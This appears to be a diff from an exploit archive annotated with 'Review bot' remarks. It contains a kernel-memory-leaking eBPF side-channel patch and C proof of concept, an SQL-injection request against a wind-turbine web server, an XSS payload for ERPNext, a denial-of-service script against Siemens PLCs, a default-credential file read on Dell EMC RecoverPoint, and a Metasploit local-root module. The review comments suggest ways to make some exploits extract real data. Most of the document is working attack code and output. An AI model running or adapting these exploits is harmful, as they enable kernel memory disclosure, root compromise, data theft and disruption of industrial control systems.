+ );
+ delay = t2 - t1;
+ }
+ rcu_read_unlock();
+ if (copy_to_user(uvalue, &delay, 8)) {
+ err = -EINVAL;
+ goto free_key;
+ }
+
+free_key:
+ kfree(key);
+err_put:
+ fdput(f);
+ return err;
+}
+
#define BPF_MAP_UPDATE_ELEM_LAST_FIELD flags
static int map_update_elem(union bpf_attr *attr)
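Review bot: the `copy_to_user` failure path sets `err = -EINVAL`; the convention for a bad user pointer in this file is `-EFAULT`. Two smaller points in the same function: the guard `attr->flags > 0x100000 || attr->flags >= map->value_size` has a redundant first clause, since the one-byte read at `ptr + attr->flags` is bounded by `value_size` alone, and the new command defines no `..._LAST_FIELD` for a `CHECK_ATTR` like the `BPF_MAP_UPDATE_ELEM_LAST_FIELD` in the context below, so trailing `bpf_attr` fields are never validated as zero.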
@@ -1713,6 +1792,9 @@ SYSCALL_DEFINE3(bpf, int, cmd, union bpf_attr
__user *, uattr, unsigned int, siz
case BPF_MAP_UPDATE_ELEM:
err = map_update_elem(&attr);
break;
+ case 0x13370001:
+ err = map_time_flush_loc(&attr);
+ break;
case BPF_MAP_DELETE_ELEM:
err = map_delete_elem(&attr);
break;
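Review bot: `case 0x13370001:` adds a command outside `enum bpf_cmd` with no privilege check of its own, so with the default `unprivileged_bpf_disabled=0` any user who can open an array map gets a kernel-side cache-timing primitive over map memory. For a PoC-only patch, gate it on `capable(CAP_SYS_ADMIN)` and give the number a named constant so it cannot silently collide with a future real command.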
diff --git a/net/core/filter.c b/net/core/filter.c
index 1c0eb436671f..e310a345054c 100644
--- a/net/core/filter.c
+++ b/net/core/filter.c
@@ -3347,6 +3347,8 @@ bpf_base_func_proto(enum bpf_func_id func_id)
return &bpf_tail_call_proto;
case BPF_FUNC_ktime_get_ns:
return &bpf_ktime_get_ns_proto;
+ case 4:
+ return &bpf_clflush_mfence_proto;
case BPF_FUNC_trace_printk:
if (capable(CAP_SYS_ADMIN))
return bpf_get_trace_printk_proto();
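Review bot: `case 4:` reuses the numeric value of `BPF_FUNC_probe_read` (id 4 in the uapi `enum bpf_func_id`), and because this is `bpf_base_func_proto`, every program type that falls through to it now resolves helper 4 to the clflush helper instead of rejecting it. Pick an id beyond the last defined helper (or add a named enum value) and write it as a `case BPF_FUNC_...` like the surrounding entries.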
----------------------- END -----------------------
The PoC:
----------------------- START -----------------------
*/
#define _GNU_SOURCE
#include <pthread.h>
#include <assert.h>
#include <err.h>
#include <stdint.h>
#include <linux/bpf.h>
#include <linux/filter.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <asm/unistd_64.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <pthread.h>
#include <errno.h>
#include <limits.h>
#include <stdbool.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stddef.h>
#include <signal.h>
#include <string.h>
#include <ctype.h>
#include <sys/mman.h>
#include <sys/user.h>
#define GPLv2 "GPL v2"
#define ARRSIZE(x) (sizeof(x) / sizeof((x)[0]))
/* registers */
/* caller-saved: r0..r5 */
#define BPF_REG_ARG1 BPF_REG_1
#define BPF_REG_ARG2 BPF_REG_2
#define BPF_REG_ARG3 BPF_REG_3
#define BPF_REG_ARG4 BPF_REG_4
#define BPF_REG_ARG5 BPF_REG_5
#define BPF_REG_CTX BPF_REG_6
#define BPF_REG_FP BPF_REG_10
#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \
((struct bpf_insn) { \
.code = BPF_LD | BPF_DW | BPF_IMM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = (__u32) (IMM) }), \
((struct bpf_insn) { \
.code = 0, /* zero is reserved opcode */ \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = ((__u64) (IMM)) >> 32 })
#define BPF_LD_MAP_FD(DST, MAP_FD) \
BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
#define BPF_MOV64_REG(DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
#define BPF_ALU64_IMM(OP, DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
((struct bpf_insn) { \
.code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })
#define BPF_EMIT_CALL(FUNC) \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_CALL, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = (FUNC) })
#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })
#define BPF_EXIT_INSN() \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_EXIT, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = 0 })
#define BPF_LD_ABS(SIZE, IMM) \
((struct bpf_insn) { \
.code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
#define BPF_ALU64_REG(OP, DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
#define BPF_MOV64_IMM(DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
int bpf_(int cmd, union bpf_attr *attrs) {
return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}
int array_create(int value_size, int num_entries) {
union bpf_attr create_map_attrs = {
.map_type = BPF_MAP_TYPE_ARRAY,
.key_size = 4,
.value_size = value_size,
.max_entries = num_entries
};
int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);
if (mapfd == -1)
err(1, "map create");
return mapfd;
}
unsigned int array_time_flush_loc(int mapfd, uint32_t idx, uint32_t off) {
uint64_t time;
union bpf_attr attr = {
.map_fd = mapfd,
.key = (uint64_t)&idx,
.value = (uint64_t)&time,
.flags = off,
};
int res = bpf_(0x13370001, &attr);
if (res)
err(1, "map flush loc");
return time;
}
void array_set_dw(int mapfd, uint32_t key, uint64_t value) {
union bpf_attr attr = {
.map_fd = mapfd,
.key = (uint64_t)&key,
.value = (uint64_t)&value,
.flags = BPF_ANY,
};
int res = bpf_(BPF_MAP_UPDATE_ELEM, &attr);
if (res)
err(1, "map update elem");
}
int prog_load(struct bpf_insn *insns, size_t insns_count) {
char verifier_log[100000];
union bpf_attr create_prog_attrs = {
.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
.insn_cnt = insns_count,
.insns = (uint64_t)insns,
.license = (uint64_t)GPLv2,
.log_level = 1,
.log_size = sizeof(verifier_log),
.log_buf = (uint64_t)verifier_log
};
int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);
int errno_ = errno;
//printf("==========================\n%s==========================\n", verifier_log);
errno = errno_;
if (progfd == -1)
err(1, "prog load");
return progfd;
}
int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count) {
int progfd = prog_load(insns, insns_count);
// hook eBPF program up to a socket
// sendmsg() to the socket will trigger the filter
// returning 0 in the filter should toss the packet
int socks[2];
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))
err(1, "socketpair");
if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))
err(1, "setsockopt");
return socks[1];
}
void trigger_proc(int sockfd) {
if (write(sockfd, "X", 1) != 1)
err(1, "write to proc socket failed");
}
int input_map, leak_map;
int sockfds[16];
int leak_bit(unsigned long addr, int bit) {
array_set_dw(input_map, 0, addr);
int count_0 = 0, count_1 = 0;
while (count_0 + count_1 < 100) {
array_time_flush_loc(leak_map, 0, 2048+0x1000);
trigger_proc(sockfds[bit+8]);
unsigned int t1 = array_time_flush_loc(leak_map, 0, 2048+0x1000);
array_time_flush_loc(leak_map, 0, 2048);
trigger_proc(sockfds[bit+0]);
unsigned int t0 = array_time_flush_loc(leak_map, 0, 2048);
//printf("%u %u\n", t0, t1);
if (t0 < 50)
count_0++;
if (t1 < 50)
count_1++;
}
printf("%d vs %d\n", count_0, count_1);
return (count_0 > count_1) ? 0 : 1;
}
int leak_byte(unsigned long addr) {
int byte = 0;
for (int bit=0; bit<8; bit++) {
byte |= leak_bit(addr, bit)<<bit;
}
return byte;
}
int main(int argc, char **argv) {
setbuf(stdout, NULL);
input_map = array_create(8, 1);
leak_map = array_create(0x3000, 1);
if (argc != 3)
errx(1, "invocation (expects addr and length)");
#define BPF_REG_CONFUSED_SLOT BPF_REG_6
#define BPF_REG_SLOW_SLOT BPF_REG_7
#define BPF_REG_CONFUSED_SLOT_ALIAS BPF_REG_8
#define BPF_REG_LEAK_ARRAY BPF_REG_9
#define BPF_REG_CONFUSED BPF_REG_1
#define BPF_REG_SECRET_VALUE BPF_REG_2
#define BPF_REG_DUMMY_SLOT BPF_REG_3
for (int i=0; i<16; i++) {
bool dummy_ff = (i >= 8);
int selected_bit = i & 7;
struct bpf_insn insns[] = {
/* setup: write 0x00 or 0xff to -216 to get a big stack
allocation and to prepare dummy */
BPF_ST_MEM(BPF_B, BPF_REG_FP, -216, dummy_ff ? 0x00 : 0xff),
/* setup: compute stack slot pointers to :
* - type-confused stack slot (at -72)
* - pointer to type-confused stack slot (at -144)
*/
BPF_MOV64_REG(BPF_REG_CONFUSED_SLOT, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_CONFUSED_SLOT, -72),
BPF_MOV64_REG(BPF_REG_SLOW_SLOT, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_SLOW_SLOT, -144),
//BPF_MOV64_REG(BPF_REG_0, BPF_REG_FP),
//BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, -216),
/* write to dummy slot (to make a big stack and to permit later read) */
//BPF_ST_MEM(BPF_DW, BPF_REG_0, 0, 0),
/* setup: store victim memory pointer in BPF_REG_CONFUSED_SLOT */
BPF_LD_MAP_FD(BPF_REG_ARG1, input_map),
BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),
BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
BPF_EXIT_INSN(),
BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),
BPF_STX_MEM(BPF_DW, BPF_REG_CONFUSED_SLOT, BPF_REG_0, 0),
/* setup: spill pointer to type-confused stack slot */
BPF_STX_MEM(BPF_DW, BPF_REG_SLOW_SLOT, BPF_REG_CONFUSED_SLOT, 0),
/* setup: load pointer to leak area into register */
BPF_LD_MAP_FD(BPF_REG_ARG1, leak_map),
BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),
BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
BPF_EXIT_INSN(),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, 2048), /* leak_map+2048 */
BPF_MOV64_REG(BPF_REG_LEAK_ARRAY, BPF_REG_0),
/* CHEATED: fence and flush */
BPF_MOV64_REG(BPF_REG_1, BPF_REG_SLOW_SLOT),
BPF_EMIT_CALL(4/*clflush_mfence*/),
BPF_MOV64_REG(BPF_REG_DUMMY_SLOT, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_DUMMY_SLOT, -216),
/* START CRITICAL PATH */
BPF_LDX_MEM(BPF_DW, BPF_REG_CONFUSED_SLOT_ALIAS,
BPF_REG_SLOW_SLOT, 0), /* high-latency read of slot address */
BPF_STX_MEM(BPF_DW, BPF_REG_CONFUSED_SLOT_ALIAS,
BPF_REG_DUMMY_SLOT, 0), /* bypassed store via high-latency address */
BPF_LDX_MEM(BPF_DW, BPF_REG_CONFUSED, BPF_REG_CONFUSED_SLOT, 0),
BPF_LDX_MEM(BPF_B, BPF_REG_SECRET_VALUE, BPF_REG_CONFUSED, 0),
BPF_ALU64_IMM(BPF_AND, BPF_REG_SECRET_VALUE, 1<<selected_bit),
/* 0 or 1 */
BPF_ALU64_IMM(BPF_LSH, BPF_REG_SECRET_VALUE, 12-selected_bit),
/* 0 or 0x1000 */
BPF_ALU64_REG(BPF_ADD, BPF_REG_LEAK_ARRAY, BPF_REG_SECRET_VALUE),
BPF_LDX_MEM(BPF_B, BPF_REG_0, BPF_REG_LEAK_ARRAY, 0),
/* END CRITICAL PATH */
BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN()
};
sockfds[i] = create_filtered_socket_fd(insns, ARRSIZE(insns));
puts("BPF PROG LOADED SUCCESSFULLY");
}
/*
puts("testing flushed...\n");
for (int i=-1; i<10; i++) {
unsigned int res = array_time_flush_loc(leak_map, 0, 2048);
if (i >= 0)
printf(" %u\n", res);
}
*/
unsigned long base_addr = strtoull(argv[1], NULL, 16);
for (int i=0; i<atoi(argv[2]); i++) {
unsigned long addr = base_addr + i;
unsigned char leaked = leak_byte(addr);
printf("%016lx: 0x%02hhx ('%c')\n", addr, leaked, leaked);
}
return 0;
}
/*
----------------------- END -----------------------
PoC usage:
$ sudo grep core_pattern /proc/kallsyms
ffffffff9b2954e0 D core_pattern
$ gcc -o bpf_store_skipper_assisted bpf_store_skipper_assisted.c
$ time ./bpf_store_skipper_assisted ffffffff9b2954e0 5
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
4 vs 96
1 vs 99
100 vs 0
100 vs 0
100 vs 0
2 vs 98
0 vs 100
100 vs 0
ffffffff9b2954e0: 0x63 ('c')
2 vs 98
1 vs 99
1 vs 99
1 vs 99
100 vs 0
2 vs 98
0 vs 100
100 vs 0
ffffffff9b2954e1: 0x6f ('o')
100 vs 0
3 vs 97
100 vs 0
100 vs 0
1 vs 99
2 vs 98
0 vs 100
100 vs 0
ffffffff9b2954e2: 0x72 ('r')
2 vs 98
100 vs 0
0 vs 100
100 vs 0
100 vs 0
0 vs 100
0 vs 100
100 vs 0
ffffffff9b2954e3: 0x65 ('e')
100 vs 0
100 vs 0
100 vs 0
100 vs 0
100 vs 0
100 vs 0
100 vs 0
100 vs 0
ffffffff9b2954e4: 0x00 ('')
real 0m31.591s
user 0m2.547s
sys 0m27.429s
*/
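Review bot: `base_addr = strtoull(argv[1], NULL, 16)` and `atoi(argv[2])` are used without an argc check, so running the binary with fewer than two arguments dereferences a NULL argv entry instead of printing a usage line; an `if (argc != 3)` guard with the same usage text as the "PoC usage" block belongs before them. The critical path also depends on the helper marked `/* CHEATED: fence and flush */` (`BPF_EMIT_CALL(4/*clflush_mfence*/)`), which is not a stock eBPF helper, but the usage transcript gives no hint of that; state next to the gcc/run commands that the shown leak of core_pattern ('c','o','r','e',0x00) was obtained on a kernel patched to provide this helper, otherwise readers will try it on an unmodified kernel and fail at program load.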


@ -0,0 +1,48 @@
# Exploit Title: Nordex N149/4.0-4.5 Wind Turbine Web Server - SQL Injection
# Date: 21-05-2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.nordex-online.com
# Tested on: Windows
# Version: N149/4.0-4.5 Wind Turbine
# Category: webapps
---> Proof Of Concept
-------- > Request
POST /php/login.php HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept: */*
Referer: http://IpAdress//
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
Host: IPAdress
Accept-Encoding: gzip, deflate
Content-Length: 304
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
login=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&password=3
-------- > Response
HTTP/1.1 200 OK
Server: Apache
Content-Length: 261
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Date: Wed, 16 May 2018 10:49:31 GMT
Vary: Accept-Encoding
<br />
<b>Warning</b>: mysqli::query(): (23000/1062): Duplicate entry
'_!@4dilemma:1' for key 'group_key' in
<b>/share/HDA_DATA/Web/php/login.php</b> on line <b>46</b><br />
<br />
<b>Notice</b>: Trying to get property of non-object in
<b>/share/HDA_DATA/Web/php/login.php</b> on line <b>47</b><br />
FALSE<br />
<b>Fatal error</b>: Call to a member function free() on boolean in
<b>/share/HDA_DATA/Web/php/login.php</b> on line <b>67</b><br />
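Review bot: the request/response pair only proves that the `login` value reaches a MySQL query with error output rendered into the page: the CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100)... sequence in the payload spells `_!@4dilemma`, and that fixed marker is exactly what comes back in `Duplicate entry '_!@4dilemma:1' for key 'group_key'`; replacing the marker with a subquery such as `version()` or `user()` inside the CONCAT would show actual data extraction rather than the sentinel. The header's "Tested on: Windows" is contradicted by the response (Apache, path `/share/HDA_DATA/Web/php/login.php`), so record the target platform rather than the client's, and note that the error-based technique relies on PHP warnings being displayed (`mysqli::query(): (23000/1062)` on line 46), which is itself a finding (full path disclosure). The `Fatal error: Call to a member function free() on boolean` on line 67 is only the consequence of the failed query, not a separate issue.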


@ -0,0 +1,17 @@
# Exploit Title: ERPnext 11.x.x - Cross-Site Scripting
# Date: 2018-05-10
# Exploit Author: Veerababu Penugonda
# Vendor Homepage: https://erpnext.com/
# Software Link: https://demo.erpnext.com/
# Version: Frappe ERPNext v11.x.x-develop
# Tested on: Mozilla Firefox quantum 60.1 , Ubuntu OS
# CVE : CVE-2018-11339
# 1. Description:
# https://demo.erpnext.com/desk#Form/Asset%20Repair/ARLOG-000015
# and functionality “Comment” is vulnerable to XSS like Stored ,
# Reflected , Cookie , possible for more
# 2. Payload :
"><script>alert(1)</script>
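Review bot: the description claims the "Comment" field is vulnerable to "XSS like Stored, Reflected, Cookie, possible for more" but shows no request and no rendered context, so a reader cannot tell which of these was actually observed; include the POST that adds the comment and the page on which `"><script>alert(1)</script>` executes. The demo URL names a specific record (ARLOG-000015) on the vendor's public demo instance and should be replaced with a placeholder host. "Version: Frappe ERPNext v11.x.x-develop" names a development branch rather than a release, so the title's "11.x.x" should say the develop branch was tested and on which date.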

exploits/linux/dos/44693.py Executable file

@ -0,0 +1,18 @@
# Exploit Title: Siemens SIMATIC S7-1500 CPU - Remote Denial of Service
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-22
# Exploit Author: t4rkd3vilz, Jameel Nabbo
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-1500 CPU all versions before V1.6
# Tested on: Kali Linux
# CVE: CVE-2014-5074
#!/usr/bin/python
import socket import sys from time import sleep if
len(sys.argv) != 2: print "Usage: exploit.py <ip>" sys.exit(0) for x in
range(1,50): s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#vulnerable TCP port 102 connect=s.connect((str(sys.argv[1]), 102))
s.send('some evil string \r\n\n') print "bufff " + str(x) + " sent...\n"
result=s.recv(1024) print result s.close() sleep(7)
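Review bot: the loop creates a blocking socket and calls `s.recv(1024)` without `s.settimeout()`, so once the CPU stops answering (the intended effect) the script hangs on the first unanswered connection instead of completing its 49 iterations; set a timeout and catch `socket.error`/`socket.timeout` around connect, send and recv. The script also does nothing specific to the cited CVE-2014-5074: it sends the literal `'some evil string \r\n\n'` to TCP/102 with a 7 s sleep, so the header should state what was observed on the CPU (STOP, reboot, loss of the web server) and on which firmware, otherwise this reads as a generic connection test. As rendered here several statements share one line (`import socket import sys from time import sleep if`, and `#vulnerable TCP port 102` lands mid-statement), which is not valid Python; verify that the committed file has one statement per line.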


@ -0,0 +1,30 @@
# Exploit Title: Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read
# Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
# Date: 2018-05-21
# Vendor Advisory: DSA-2018-095
# Vendor KB: https://support.emc.com/kb/521234
# Exploit Author: Paul Taylor
# Github: https://github.com/bao7uo/dell-emc_recoverpoint
# Website: https://www.foregenix.com/blog/foregenix-identify-dell-emc-recoverpoint-zero-day-vulnerabilities
# Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
# CVE: N/A
# 1. Description
# When logging in as boxmgmt and running an internal command, the ssh command may be used
# to display the contents of files from the file system which are accessible to the boxmgmt user.
# 2. Proof of Concept
# Log in as boxmgmt via SSH (default credentials boxmgmt/boxmgmt)
# Select [3] Diagnostics
# Select [5] Run Internal Command
# ssh -F /etc/passwd 127.0.0.1
test-cluster: 5
This is the list of commands you are allowed to use: ALAT NetDiag arp arping date ethtool kps.pl netstat ping ping6 ssh telnet top uptime
Enter internal command: ssh -F /etc/passwd 127.0.0.1
/etc/passwd: line 1: Bad configuration option: root:x:0:0:root:/root:/bin/tcsh
/etc/passwd: line 2: Bad configuration option: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
/etc/passwd: line 3: Bad configuration option: bin:x:2:2:bin:/bin:/usr/sbin/nologin
<SNIP>
/etc/passwd: terminating, 34 bad configuration options
Command "ssh -F /etc/passwd 127.0.0.1" exited with return code 65280
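Review bot: the technique discloses a file only as far as ssh's config parser rejects it: each line that is not a valid ssh_config keyword is echoed in a "Bad configuration option" error, so comment lines (beginning with `#`) and lines that happen to start with a valid keyword are accepted silently and never shown; the description's "display the contents of files" should carry that caveat, and the transcript works so cleanly for /etc/passwd (`terminating, 34 bad configuration options`) precisely because none of its lines parse as a keyword. "CVE: N/A" sits next to "Vendor Advisory: DSA-2018-095"; check the advisory for the identifier assigned to this issue rather than recording none. Minor: `exited with return code 65280` is ssh's exit status 255 shifted into the high byte, i.e. the boxmgmt CLI prints the raw wait status, which is worth a sentence so readers do not look for an ssh error code 65280.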

exploits/linux/local/44696.rb Executable file

@ -0,0 +1,200 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Post::Linux::Kernel
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'AF_PACKET chocobo_root Privilege Escalation',
'Description' => %q{
This module exploits a race condition and use-after-free in the
packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in
the Linux kernel to execute code as root (CVE-2016-8655).
The bug was initially introduced in 2011 and patched in 2016 in version
4.4.0-53.74, potentially affecting a large number of kernels; however
this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels
4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as
Linux Mint.
The target system must have unprivileged user namespaces enabled and
two or more CPU cores.
Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation
may crash the kernel.
This module has been tested successfully on Linux Mint 17.3 (x86_64);
Linux Mint 18 (x86_64); and Ubuntu 16.04.2 (x86_64) with kernel
versions 4.4.0-45-generic and 4.4.0-51-generic.
},
'License' => MSF_LICENSE,
'Author' =>
[
'rebel', # Discovery and chocobo_root.c exploit
'Brendan Coles' # Metasploit
],
'DisclosureDate' => 'Aug 12 2016',
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'Privileged' => true,
'References' =>
[
[ 'AKA', 'chocobo_root.c' ],
[ 'EDB', '40871' ],
[ 'CVE', '2016-8655' ],
[ 'BID', '94692' ],
[ 'URL', 'http://seclists.org/oss-sec/2016/q4/607' ],
[ 'URL', 'http://seclists.org/oss-sec/2016/q4/att-621/chocobo_root_c.bin' ],
[ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/master/CVE-2016-8655/chocobo_root.c' ],
[ 'URL', 'https://bitbucket.org/externalist/1day_exploits/src/master/CVE-2016-8655/CVE-2016-8655_chocobo_root_commented.c' ],
[ 'URL', 'https://usn.ubuntu.com/3151-1/' ],
[ 'URL', 'https://www.securitytracker.com/id/1037403' ],
[ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c' ]
],
'DefaultTarget' => 0))
register_options [
OptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '600' ]),
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
]
end
def timeout
datastore['TIMEOUT'].to_i
end
def base_dir
datastore['WritableDir'].to_s
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
end
def upload_and_chmodx(path, data)
upload path, data
cmd_exec "chmod +x '#{path}'"
end
def upload_and_compile(path, data)
upload "#{path}.c", data
gcc_cmd = "gcc -o #{path} #{path}.c -lpthread"
if session.type.eql? 'shell'
gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
end
output = cmd_exec gcc_cmd
rm_f "#{path}.c"
unless output.blank?
print_error output
fail_with Failure::Unknown, "#{path}.c failed to compile"
end
cmd_exec "chmod +x #{path}"
end
def exploit_data(file)
path = ::File.join Msf::Config.data_directory, 'exploits', 'CVE-2016-8655', file
fd = ::File.open path, 'rb'
data = fd.read fd.stat.size
fd.close
data
end
def live_compile?
return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
if has_gcc?
vprint_good 'gcc is installed'
return true
end
unless datastore['COMPILE'].eql? 'Auto'
fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
end
end
def check
version = kernel_release
unless version =~ /^4\.4\.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic/
vprint_error "Linux kernel version #{version} is not vulnerable"
return CheckCode::Safe
end
vprint_good "Linux kernel version #{version} is vulnerable"
arch = kernel_hardware
unless arch.include? 'x86_64'
vprint_error "System architecture #{arch} is not supported"
return CheckCode::Safe
end
vprint_good "System architecture #{arch} is supported"
cores = get_cpu_info[:cores].to_i
min_required_cores = 2
unless cores >= min_required_cores
vprint_error "System has less than #{min_required_cores} CPU cores"
return CheckCode::Safe
end
vprint_good "System has #{cores} CPU cores"
unless userns_enabled?
vprint_error 'Unprivileged user namespaces are not permitted'
return CheckCode::Safe
end
vprint_good 'Unprivileged user namespaces are permitted'
CheckCode::Appears
end
def exploit
if check != CheckCode::Appears
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
# Upload exploit executable
executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
executable_path = "#{base_dir}/#{executable_name}"
if live_compile?
vprint_status 'Live compiling exploit on system...'
upload_and_compile executable_path, exploit_data('chocobo_root.c')
else
vprint_status 'Dropping pre-compiled exploit on system...'
upload_and_chmodx executable_path, exploit_data('chocobo_root')
end
# Upload payload executable
payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
upload_and_chmodx payload_path, generate_payload_exe
# Launch exploit
print_status "Launching exploit (Timeout: #{timeout})..."
output = cmd_exec "echo '#{payload_path} & exit' | #{executable_path}", nil, timeout
output.each_line { |line| vprint_status line.chomp }
print_status "Cleaning up #{payload_path} and #{executable_path}.."
rm_f executable_path
rm_f payload_path
end
end
